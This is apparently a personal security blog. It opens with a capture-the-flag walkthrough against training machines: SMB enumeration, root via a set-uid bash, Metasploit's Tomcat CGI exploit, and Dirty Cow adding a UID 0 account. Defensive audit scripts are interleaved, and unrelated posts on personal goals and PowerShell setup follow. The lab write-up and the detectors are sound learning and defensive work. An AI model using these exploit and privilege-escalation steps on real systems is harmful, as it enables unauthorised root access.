| Share Enumeration on 10.10.180.212 |
==========================================
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
tbfc-hr Disk tbfc-hr
tbfc-it Disk tbfc-it
tbfc-santa Disk tbfc-santa
IPC$ IPC IPC Service (tbfc-smb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
TBFC-SMB-01 TBFC-SMB
[+] Attempting to map shares on 10.10.180.212
//10.10.180.212/tbfc-hr Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-it Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-santa Mapping: OK, Listing: OK
//10.10.180.212/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Dec 13 09:45:11 2020
The output shows us that tbfc-santa could be mapped with a null session (empty username and password), so let's log into this share with no password. With dir we list the content and should have all information to finish the tasks.
Day 11 – The Rogue Gnome
We start up the AttackBox and the challenge. While they boot we read the documentation in the challenge and answer the first two questions.
Then we SSH into the box with the provided credentials: ssh cmnatic@10.10.154.38. On the first connect, you will have to confirm the server's fingerprint.
With find / -perm -u=s -type f 2>/dev/null we search for binaries that have the SUID bit set, meaning they run with the permissions of the file's owner rather than those of the user who starts them.
/bin/bash looks like a very promising candidate. Let's check the permissions.
-bash-4.4$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash
-bash-4.4$
Looks like it is owned by root and has the s bit set, so it runs as root. We will do just that with bash -p (the -p flag stops bash from dropping the effective uid).
Now we can cat the flag file.
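Both the writable backup script of Day 9 and the set-uid /bin/bash of this day are findings a file-permission audit should surface before an attacker does. The following Python is an added example, not part of the challenge: it walks a directory tree and reports set-uid and set-gid regular files and files writable by group or others, the equivalent of the find command above plus a writability check. It builds its own sample tree in a temporary directory (a world-writable backup.sh under an FTP directory and a set-uid copy of a fake shell), so the layout, names and modes are constructed for the example.

```python
"""File-permission audit for set-uid and writable files (added example)."""
import os
import stat
import tempfile


def audit_tree(root: str) -> dict:
    """Return {'suid': [...], 'sgid': [...], 'writable': [...]} with paths
    relative to root, sorted. Symlinks and special files are skipped."""
    findings = {"suid": [], "sgid": [], "writable": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable, nothing to report
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_ISUID:
                findings["suid"].append(rel)
            if st.st_mode & stat.S_ISGID:
                findings["sgid"].append(rel)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings["writable"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def build_sample_tree() -> str:
    """Constructed layout: a world-writable backup script in an FTP directory
    and a set-uid 'shell', next to a harmless file. Returns the root path."""
    root = tempfile.mkdtemp(prefix="audit-demo-")
    ftp = os.path.join(root, "opt", "ftp", "public")
    os.makedirs(ftp)
    script = os.path.join(ftp, "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\ntar -zcvf /tmp/backup.tar.gz /opt/ftp\n")
    os.chmod(script, 0o777)  # rwxrwxrwx: anyone may edit what cron will run
    binroot = os.path.join(root, "bin")
    os.makedirs(binroot)
    fake_bash = os.path.join(binroot, "bash")
    with open(fake_bash, "w") as fh:
        fh.write("#!/bin/sh\necho not really bash\n")
    os.chmod(fake_bash, 0o4755)  # rwsr-xr-x, as in the ls -la output above
    readme = os.path.join(root, "README")
    with open(readme, "w") as fh:
        fh.write("nothing to see\n")
    os.chmod(readme, 0o644)
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for kind, paths in audit_tree(demo_root).items():
        print(f"{kind}: {paths}")
```

Against a real host, call audit_tree("/") and compare the suid list with the distribution's known set-uid binaries; a shell or interpreter in that list, or a script in a writable directory that a scheduled job runs, is the condition both of these days exploit.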
Day 12: Ready, set, elf.
After deploying the boxes we run a quick nmap scan to get an overview:
root@ip-10-10-214-41:~# nmap -sV -v 10.10.83.199
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 10:24 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:24
Scanning 10.10.83.199 [1 port]
Completed ARP Ping Scan at 10:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.00s elapsed
Initiating SYN Stealth Scan at 10:24
Scanning ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199) [1000 ports]
Discovered open port 8080/tcp on 10.10.83.199
Discovered open port 3389/tcp on 10.10.83.199
Discovered open port 8009/tcp on 10.10.83.199
Increasing send delay for 10.10.83.199 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Completed SYN Stealth Scan at 10:24, 20.25s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 3 services on ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Completed Service scan at 10:25, 13.88s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.83.199.
Initiating NSE at 10:25
Completed NSE at 10:25, 0.30s elapsed
Initiating NSE at 10:25
Completed NSE at 10:25, 0.00s elapsed
Nmap scan report for ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Host is up (0.011s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:34:E1:B1:70:6F (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.07 seconds
Raw packets sent: 3011 (132.468KB) | Rcvd: 20 (872B)
Looks like there is a web server running on port 8080. Let’s look at it by pulling it up in the browser.
Here we can see what version of Tomcat is running. Now we start Metasploit with msfconsole.
search tomcat lists a number of exploits Metasploit provides for Tomcat. info followed by a module path lets us view the details of an exploit.
The one that seems promising is exploit/windows/http/tomcat_cgi_cmdlineargs, so we look at its details:
msf5 > info exploit/windows/http/tomcat_cgi_cmdlineargs
Name: Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
Module: exploit/windows/http/tomcat_cgi_cmdlineargs
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2019-04-10
Provided by:
Yakov Shafranovich
sinn3r <sinn3r@metasploit.com>
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Apache Tomcat 9.0 or prior for Windows
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI path to CGI script
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a vulnerability in Apache Tomcat's CGIServlet
component. When the enableCmdLineArguments setting is set to true, a
remote user can abuse this to execute system commands, and gain
remote code execution.
References:
https://cvedetails.com/cve/CVE-2019-0232/
We select it with use exploit/windows/http/tomcat_cgi_cmdlineargs.
options shows us the available settings for this exploit. First we double check that LHOST is our attack box IP.
Then we set RHOST to the server's IP: set RHOST 10.10.83.199
Now we need a file in the cgi folder. Following the challenge description we can find http://10.10.83.199:8080/cgi-bin/elfwhacker.bat. We use set TARGETURI /cgi-bin/elfwhacker.bat and double check our options.
When everything is fine, we issue exploit to start the attack.
We are now in a meterpreter session on the server. With dir we can list the directory content.
We can cat the flag file and finish the challenge. There is more to explore here and you should use the opportunity to play around with Metasploit and privilege escalation.
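The module description above points at a configuration setting rather than a code bug, so the same condition can be audited from the server side. As an added example (not part of the original post or of Metasploit), the Python below parses a Tomcat web.xml, using a constructed sample, and flags a CGIServlet declaration whose enableCmdLineArguments is set to true:

```python
"""Audit a Tomcat web.xml for the CGIServlet setting behind CVE-2019-0232 (added example)."""
import xml.etree.ElementTree as ET

CGI_SERVLET = "org.apache.catalina.servlets.CGIServlet"
# Constructed sample in the shape of Tomcat's conf/web.xml, with the CGI servlet switched on.
SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi-bin/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

def _local(tag):
    """Drop the XML namespace so tags compare by local name."""
    return tag.rsplit("}", 1)[-1]

def _child_text(elem, name):
    """Text of the first direct child element called name, or None."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None

def audit_cgi_servlet(web_xml):
    """Report whether the CGIServlet is declared, where it is mapped, and its enableCmdLineArguments value."""
    root = ET.fromstring(web_xml)
    result = {"enabled": False, "cmdline_args": False, "url_patterns": [], "verdict": "ok"}
    servlets = [e for e in root.iter() if _local(e.tag) == "servlet"]
    mappings = [e for e in root.iter() if _local(e.tag) == "servlet-mapping"]
    for servlet in servlets:
        if _child_text(servlet, "servlet-class") != CGI_SERVLET:
            continue
        result["enabled"] = True
        name = _child_text(servlet, "servlet-name")
        result["url_patterns"] += [_child_text(m, "url-pattern") for m in mappings if _child_text(m, "servlet-name") == name]
        for param in servlet:
            # An absent parameter falls back to the Tomcat version's own default, which is not modelled here.
            if _local(param.tag) == "init-param" and _child_text(param, "param-name") == "enableCmdLineArguments":
                result["cmdline_args"] = (_child_text(param, "param-value") or "").lower() == "true"
    if result["enabled"] and result["cmdline_args"]:
        result["verdict"] = "CGIServlet active with enableCmdLineArguments=true: set it to false"
    elif result["enabled"]:
        result["verdict"] = "CGIServlet active: confirm the CGI mapping is really needed"
    return result
```

Run it against the real conf/web.xml (and any per-application WEB-INF/web.xml) of a Windows Tomcat, since a CGI mapping like /cgi-bin/* combined with the true value is the exact condition the module above needs.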
Day 13: Coal For Christmas
As always, hit the deploy buttons. Once everything is booted up, we run a quick nmap scan.
root@ip-10-10-224-179:~# nmap 10.10.34.134
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-14 10:58 GMT
Nmap scan report for ip-10-10-34-134.eu-west-1.compute.internal (10.10.34.134)
Host is up (0.00082s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
111/tcp open rpcbind
MAC Address: 02:91:2C:86:CD:15 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds
Telnet is an insecure predecessor of SSH. So let's connect with telnet 10.10.34.134 23. Luckily for us, we are provided with credentials in the greeting text.
First thing we do is get an idea of what system we are dealing with.
$ uname -a
Linux christmas 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
With ls we have a look at what files we have in our home folder.
$ ls
christmas.sh cookies_and_milk.txt
Looking at cookies_and_milk.txt we will be able to answer the question of who got there first.
The challenge asks us to learn about Dirty Cow. Let’s do that.
On the site you can find a link to the code of the Dirty Cow exploit. To get the code onto the box, I create a new file with nano dirty.c and copy-paste the source. CTRL+O saves the file, CTRL+X closes the editor.
In the comment header of the source code we just copied, it is explained how to compile the exploit. So let's do that with gcc -pthread dirty.c -o dirty -lcrypt.
Now we run the exploit. In my case, I went for the absolutely insecure password of foo when prompted.
$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash
mmap: 7f9ccb251000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
With su firefart we change what user we are running as. cd ~ brings us to the home of firefart. In there we find message_from_the_grinch.txt.
firefart@christmas:~# cat message_from_the_grinch.txt
Nice work, Santa!
Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!
Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.
The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!
- Yours,
John Hammond
er, sorry, I mean, the Grinch
- THE GRINCH, SERIOUSLY
Following the instructions we use touch coal to create the coal file, then run tree | md5sum to get the final answer.
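The exploit's own output shows what it leaves behind: a second UID 0 account with its password hash written straight into /etc/passwd, plus a backup copy in /tmp/passwd.bak. As an added example, not part of the original post or of the Dirty Cow PoC, this Python check parses a constructed copy of /etc/passwd, flags exactly those traces, and diffs it against the backup:

```python
"""Spot the footprint the Dirty Cow PoC leaves in /etc/passwd (added example)."""
from dataclasses import dataclass

# Constructed sample of /etc/passwd after the PoC ran; the last line is the one it appends.
PASSWD_AFTER = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
santa:x:1000:1000:Santa Claus,,,:/home/santa:/bin/bash
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash
"""
# Constructed stand-in for the backup the PoC writes to /tmp/passwd.bak.
PASSWD_BACKUP = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
santa:x:1000:1000:Santa Claus,,,:/home/santa:/bin/bash
"""

@dataclass
class Finding:
    user: str
    reason: str

def parse_passwd(text):
    """Parse passwd(5) lines into dicts; raise on a malformed line rather than skipping it."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        entries.append({"name": fields[0], "hash": fields[1], "uid": int(fields[2]),
                        "gid": int(fields[3]), "gecos": fields[4], "home": fields[5], "shell": fields[6]})
    return entries

def audit_passwd(current, baseline=None):
    """Return findings for extra UID 0 accounts, inline hashes, and accounts missing from the baseline."""
    findings = []
    current_entries = parse_passwd(current)
    for e in current_entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(Finding(e["name"], "UID 0 account other than root"))
        # 'x', '*' and '!'-prefixed values are shadow or locked markers; anything else is a real hash.
        if e["hash"] not in ("x", "*", "") and not e["hash"].startswith("!"):
            findings.append(Finding(e["name"], "password hash stored in /etc/passwd instead of /etc/shadow"))
    if baseline is not None:
        known = {e["name"] for e in parse_passwd(baseline)}
        for e in current_entries:
            if e["name"] not in known:
                findings.append(Finding(e["name"], "account not present in baseline copy"))
    return findings
```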
I’m usually not a huge fan of making resolutions because I get far too easy into the habit of letting them slip. Because everyone does, right?
But on the other hand, having no goals is not a good thing either. So I’m going to put a bit of pressure on myself by publicly declaring my (non work related) goals for the month.
Blog Stuff
Both as in blogging stuff as well as doing blog related stuff. So what exactly?
at least 2 more blog posts
make sure everything is GDPR compliant
write an about page
a few minor tweaks
Reading
I want to finish at least one book on my reading list and make progress on the others:
The Go Programming Language – Donovan & Kernighan
A basic, but rather technical introduction to Go for people who already know how to program in other languages.
I’m using a lot of tools written in Go for work, and for a curious mind like me this leads to wanting a better understanding of the language. Usually my brain is pretty roasted after taking care of the baby and work, so I don’t expect to make much progress in this one.
How to solve it – Polya
This is a classic and a recommended read for everyone in a scientific field or for teachers.
Funnily enough it was recommended to me by my math teacher, by the math professor while I was studying chemical biology and by my math professor in the computer science classes. But the first two of them were so unlikable that I discarded pretty much everything they recommended. Not to my benefit.
I did read it in my first year of CS at the university and it is a great book. I’m rereading it with two goals in mind:
Getting a better grasp of English math terms (reading it in English now, not German as before)
Being reminded of the lessons for teachers, so I can explain things better once my daughter is old enough
New solutions for Cybersecurity – Shrobe, Shrier, Pentland
This is a collections of articles about Cybersecurity. I haven’t read anything in it yet, despite buying it close to the release early last year. It got mentioned quite positively in many security podcasts and conversations with colleagues.
There is not even a good reason why I have not read it yet, other than not finding the time for it.
Tribe of hackers – Carey, Jin
Here we have an interview collection with well-known hackers. I’m only a few in but so far it has been very interesting. Each interview is rather short so it fits my short time slots when the baby is busy rather well.
Kindle
Mostly for reading along with SciFi audiobooks. I’m currently on Ryk Brown's Frontiers Saga. But of course an occasional smut book sneaks on there as well.
Wrap up Gaming side projects
I won’t go into details here but I have a rather high number of unfinished gaming related side projects. From updated websites to Star Citizen training modules. I really have to consolidate my commitments in that area. It is getting too much for my currently available free time.
Of course finishing things takes time, but if it goes well, I should have more free time again next month.
Fitness & Diet
I used to work out & train every day as a kid and young adult, then dropped the habit when I went to university. It was not exactly a healthy life until about 3 years ago when I started regular workouts again.
But in the last 2 months, since my wife is back at work and I’m alone with the baby, I both lack opportunity and motivation for workouts. In addition I picked up some unhealthy eating habits.
I tried 5 min HIIT workouts last month but being sick for a week got me off track again. So, one more try this month!
Since I added about 3kg of extra weight in the last 2 months, I’ll also put myself on intermittent fasting once more. It already served me well when getting back into shape 3 years ago.
Will it work?
I have no clue, but it does not seem unrealistic at least. I do need more focus on my goals in my life so this is a start. I’ll tell you in a month how it went.
Gosh, has it been a while since I started this blog, and I only made it to two, now rather outdated, posts. Not exactly what I had in mind back then but this is where it is now.
Every time a WordPress update came along or other maintenance tasks had to be done I wondered if I should just get rid of it, but that never felt right. I might return to writing some day.
I guess that day has come!
Writing has always been a way to structure my mind. There probably are several dozen draft blog posts on my hard drive and while I never got to touching them up well enough for publication, they all served their purpose at the time of writing: They allowed me to reflect on the topic and get my thoughts in order.
What to expect
The tagline of the blog used to be
security. code. games. learning
That described my goals pretty well but, like I said, not much ever came of it. Life has changed quite a bit so I adjusted that as well.
security. code. parenting. learning. games.
Security
Eventually I want to get back to some non-NDA security research in my free time, so this stays there for now, even if I don’t expect much security posts to come this year. With changing projects, I’m pretty sure it will change as well.
Code
Like with security, there probably won’t be that many coding related posts in the near future, but security and code to me pretty much go hand in hand. Since I have a few side projects in mind for the next months, there might be something ending up here.
Parenting
We have an 11 month old daughter and I am her main caretaker. So naturally a lot of the stuff on my mind is related to her and how to be a good parent. I don’t intend to post everyday stories but to discuss overarching themes and struggles.
Learning
Technically I’m still a computer science student and while I might not be very active at the university right now, this year I’m aiming for a lot of self improvement. Not really sure how much will be worth articles, but sometimes things just are easier understood when written down for others.
Games
Games have been my passion ever since. Tabletop RPGs, Board Games, Poker, LARP (Live Action Roleplay), Computer Games (esp. shooter & MMOs).
How could I not write on occasion about them?
Other Stuff
I’m sure I have forgotten some things, but this is my personal blog, so expect some random stuff as well 😉
Quick Introduction
So who am I?
In a nutshell, I’m an IT security consultant, have an 11 month old daughter, have been married for 4 years now but together with my wife for 16 years. I love games, science and metal, enjoy sports and, generally speaking, challenges.
And that’s it for now, I’ll eventually put a proper about me section onto the page.
Since I am usually doing most development on my Linux laptop, a decent command line interface is something I want on Windows as well. Most of this setup is inspired by this Totally Tooling Tip.
The Windows PowerShell on its own is quite powerful already but can be enhanced quite a bit.
Setting powershell up
Most enhancements to PowerShell come as modules. With PSGet they can be managed easily. But to be able to run modules, the execution policy has to be set to allow external modules:
Set-ExecutionPolicy RemoteSigned
After that, the command from the PSGet page installs the module manager.
Again it is installed with a one liner that you copy from their page.
The module's author has written a nice article about how to use it.
Cmder
A really nice collection of PowerShell modules, skins and a way to have tabs, split the window into multiple consoles and so on is cmder. The drawback is that their modules are not signed and you have to lower the rules of the execution policy even further.